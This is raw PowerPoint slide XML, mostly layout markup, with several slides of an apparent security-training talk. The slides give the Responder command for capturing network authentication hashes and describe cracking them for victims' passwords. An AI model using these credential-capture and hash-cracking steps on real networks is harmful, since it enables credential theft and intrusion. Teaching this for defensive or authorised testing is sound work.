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1" autoAdjust="0"/>
    <p:restoredTop sz="94660"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr snapToGrid="0">
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="75" d="100"/>
          <a:sy n="75" d="100"/>
        </p:scale>
        <p:origin x="735"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00AAD7-6529-4DE7-AFB6-CE68E8D3A415}" type="datetimeFigureOut">
              <a:rPr lang="en-GB" smtClean="0"/>
              <a:t>05/03/2025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B1D74D-3047-44FB-90D5-C0D291E8FAD5}" type="slidenum">
              <a:rPr lang="en-GB" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1533150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3B1D74D-3047-44FB-90D5-C0D291E8FAD5}" type="slidenum">
              <a:rPr lang="en-GB" smtClean="0"/>
              <a:t>5</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="28723464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9BD5C-0595-F796-2BE4-51EADFAB06D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837F3E4D-140D-DCBA-8220-C19C7EB393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9960EC0F-543D-1E87-8EB1-B7D746426899}"/>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5" name="Footer Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{751B488F-6E71-C096-2120-E59B7FE7EED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203FD3-490B-6AE0-9F52-51A1BAAF5877}"/>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2312645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7199-459C-D84C-3F0C-EB4F7869D809}"/>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4BA39359-E992-CC0D-D24D-E92DABB44DD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D366748-6145-AABB-F306-CB16454171F1}"/>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5" name="Footer Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{328482E0-ADD8-F20E-76D4-FAB7FFC80C4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1153F30-05AE-8DC2-1BA0-2425A7EC4EED}"/>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7460826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F96785-2715-4CA8-D04F-0705D22C2AC5}"/>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AD4529D0-6712-5DB0-82C9-410FA88FE1B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1D8E5353-9180-28D5-D740-B7BFB8D361D9}"/>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5" name="Footer Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A58F6263-97D5-3787-D663-7ACC579B271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FB15824-FCD7-15D2-64A1-6EC18ABCA95B}"/>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2816945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053BC-3A05-1C93-61A6-A505E675A99D}"/>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B197592-71F2-9A76-02BB-6307ECF823D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DBF3D49C-C3B7-E003-CE26-19D2E1E7C4E0}"/>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5" name="Footer Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DBF94DD6-81AB-9F55-E631-5A496470CBE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78B829-BB50-70E3-DE94-96761BDE0A1D}"/>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4095970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C5759-7581-91CA-6062-7E2DAFAC73F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BD0212DA-6CB0-30CF-832E-041BB2F15E8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75AE0DB-8830-0C77-2659-2DD217FC8A53}"/>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5" name="Footer Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{59186753-855F-6F5E-6E7A-40CC62A00F6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2372657-5FCA-5FC1-91E9-DCF9620A442F}"/>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561081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8D7E7-76CA-F459-B7C7-606D5C91E2BA}"/>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64D8AD2D-FAED-4E15-776D-1E399C57E12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5BCB0D1A-8A50-3EA0-8E5C-F9BD40FCEBD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0C1E1A14-7F44-4CDE-C7D2-58F748AA0D2F}"/>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6" name="Footer Placeholder 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{82E677CD-BECE-8264-591D-71E36FF72DC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3466D5D-C191-8A29-966D-EA607C44F266}"/>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38800618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C3ECD-04BF-DEA9-9CE6-49822AD83BBB}"/>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940A327A-9632-418D-59EA-0699CD96BD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CDC3C54-B92A-389F-DAA6-DCB16B2CA32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E63293A7-EF03-A1DA-9256-6AA56D8ED4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4CCCC12-E68E-3C58-91C7-865200025A3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28EF057F-EC25-01EC-8197-E10B32F5F39F}"/>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8" name="Footer Placeholder 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CC6180BA-7A64-583F-B33A-A69B2AABB3C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427CD96-E1DB-1BE0-BDCA-6B651AA0EFE3}"/>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1217649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83804-1DAE-0678-25A0-70DD7013CD37}"/>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F0E80B07-CEBA-88C8-506A-7904402F1CF3}"/>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4" name="Footer Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4DD828AD-96D2-C766-D4DA-1793CFFCE4F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ECFE8DD-8B0C-63C6-92E3-2AEF2359C3F5}"/>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1126972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FDC5AB-C762-16E8-838A-3DE9FF1F14C8}"/>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3" name="Footer Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A5F5AFBC-5045-5015-0DC0-2222E32109B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18A561C-0B64-4043-7361-6A1C0C97BEDE}"/>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3406624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A4592-184C-4395-20A7-741DE0ACC65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0E68BD14-76F8-6015-DE87-50C78C5AFB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98D20563-F611-2276-6DB2-84B3F61793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F2B6A03-87C4-D074-9F61-C39769F46A15}"/>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6" name="Footer Placeholder 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{64D44A54-3C59-1DD5-02FA-023664CB54D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784D266-2A1B-BECC-9AB0-69B08496A9AC}"/>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4078847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E917C-6DAB-739F-B518-B66ED8BCE40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E6F09C98-E627-165E-22A3-07C56FC657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8D8F1F1-955A-FB8D-141F-D0CDD885B5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21BEEE2-D6F0-6DFC-251F-8FCFEAC924EF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{5EEB661F-5F3F-4AE5-8F1E-3CE89FC7E44C}" type="datetimeFigureOut">
              <a:rPr lang="en-GB" smtClean="0"/>
              <a:t>05/03/2025</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Footer Placeholder 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{374DB1C1-BA0A-AB6D-2A0D-4B2BFA3A1AA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646656C-C753-987C-C12E-0A026D1167C4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{B306047E-727F-4941-8AAB-91F1B9AFEE5F}" type="slidenum">
              <a:rPr lang="en-GB" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2862620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2E36B4-946F-1A82-1B72-F0C1276112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F134048D-C33F-5050-3EFE-796CA4C390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2C1705D5-61DC-C057-6527-E1E2B06A7E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EEB661F-5F3F-4AE5-8F1E-3CE89FC7E44C}" type="datetimeFigureOut">
              <a:rPr lang="en-GB" smtClean="0"/>
              <a:t>05/03/2025</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Footer Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{613745BD-D0BB-65DD-8364-68F3291A62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F39AA03A-7F5A-1CB1-7EE8-E9715FC93E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06047E-727F-4941-8AAB-91F1B9AFEE5F}" type="slidenum">
              <a:rPr lang="en-GB" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3330915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90055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392CB79-818B-18A4-1D09-56AD522BB7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9941" y="0"/>
            <a:ext cx="10892118" cy="6858000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4158871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95E37-8838-EA9F-B036-FE00803C3F98}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>responder</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E0A6531E-2F21-D251-65C9-8D2D3A2B63C0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Responder requires zero setup, however later on you will understand how it limits what an attacker can do.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>All you need to do for responder is run the command:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>sudo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> responder -I &lt;interface&gt; -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>wd</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg2"/>
              </a:solidFill>
              <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Simply set the interface to whatever interface you want to listen on. Be it a VPN (usually </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>“tun*”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>), wireless (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>wlan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>*”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>), ethernet (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>“eth*”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>), or any other weird interfaces you’ve got going on.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>As long as the target machines can reach it, you’re good to go.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="54342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A51A1B-629B-5131-1BE1-CBA952BB581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90468"/>
            <a:ext cx="12192000" cy="2077064"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{49F3ADFC-D7B0-AE4F-6649-157FD4FD02C3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="558800" y="5022850"/>
            <a:ext cx="11074400" cy="523220"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(Responder gives prettier output than </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>impacket-smbserver</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="18452678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4AF04-EF62-3121-E190-92DC7A07A50F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Is that it?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D129310D-AD85-6E4E-A770-FE57D9FE6342}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-GB" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-GB" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-GB" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="8800" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>NO</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-GB" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1310681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E52CA-07A8-2772-8A94-62915D204F34}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>You can crack the hashes! (sometimes)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7D711BB4-358F-602F-5540-58A15C2D9498}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="1825625"/>
            <a:ext cx="10515600" cy="2168525"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>You can attempt to crack the hashes that you gather, using either of the tools, to get the plaintext password of the victim!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>…Sometimes. This only works if the victim’s password is in your password dictionary or if you’ve got 32 years to wait for a brute-force attack to crack it.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-GB" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C840B060-F6F8-E4BA-993F-3A187CFC9422}"/>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421" y="4052887"/>
            <a:ext cx="11471157" cy="1966913"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="12808107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708C1-22EE-BD12-DDC7-D4B4EA98C516}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Cool, I got their password, it’s not as if I’m sat at their PC and I can login…</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D86E48B2-9137-8260-9176-87B3664E6A1D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="8000" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>WRONG!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="683680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D8738-616D-B53D-29BF-D3DF239342EB}"/>
              </a:ext>
